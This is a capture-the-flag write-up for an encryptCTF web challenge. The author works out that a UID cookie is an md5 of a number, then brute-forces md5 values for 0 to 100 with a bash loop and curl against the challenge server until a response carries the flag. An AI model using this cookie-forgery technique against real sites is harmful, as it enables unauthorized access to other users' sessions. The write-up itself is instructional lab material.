Tags: web
Rating:
Checking the cookies for the challenge we can see there are two of them
FLAG=encryptCTF{y0u_c4nt_U53_m3}
UID=f899139df5e1059396431415e770c6dd
The UID looks like an md5 hash so decoding that we get 100 so UID=100 and that gives us the FLAG cookie we can't use. So curl and bash to the rescue
`for i in {0..100}; do echo -n $i | md5sum | sed -e "s/ -//"; done > 0-100.md5`
this gives us md5 sums or 0-100 without the trailing -
Once we have the md5 sums we fire them off to curl and dump only the headers and pipe it to grep for encryptctf
`while read line; do curl -sSL --cookie "UID=$line" -D - http://104.154.106.182:8080/; done < 0-100.md5 | grep -i encrypt`
Set-Cookie: FLAG=encryptCTF%7B4lwa4y5_Ch3ck_7h3_c00ki3s%7D%0A
Set-Cookie: FLAG=encryptCTF%7By0u_c4nt_U53_m3%7D
Set-Cookie: FLAG=encryptCTF%7By0u_c4nt_U53_m3%7D
Set-Cookie: FLAG=encryptCTF%7By0u_c4nt_U53_m3%7D
with headers
HTTP/1.1 200 OK
Date: Thu, 04 Apr 2019 11:27:26 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.3.3
Set-Cookie: FLAG=encryptCTF%7B4lwa4y5_Ch3ck_7h3_c00ki3s%7D%0A
Vary: Accept-Encoding
Content-Length: 353
Content-Type: text/html; charset=UTF-8
`FLAG: encryptCTF{4lwa4y5_Ch3ck_7h3_c00ki3s}`
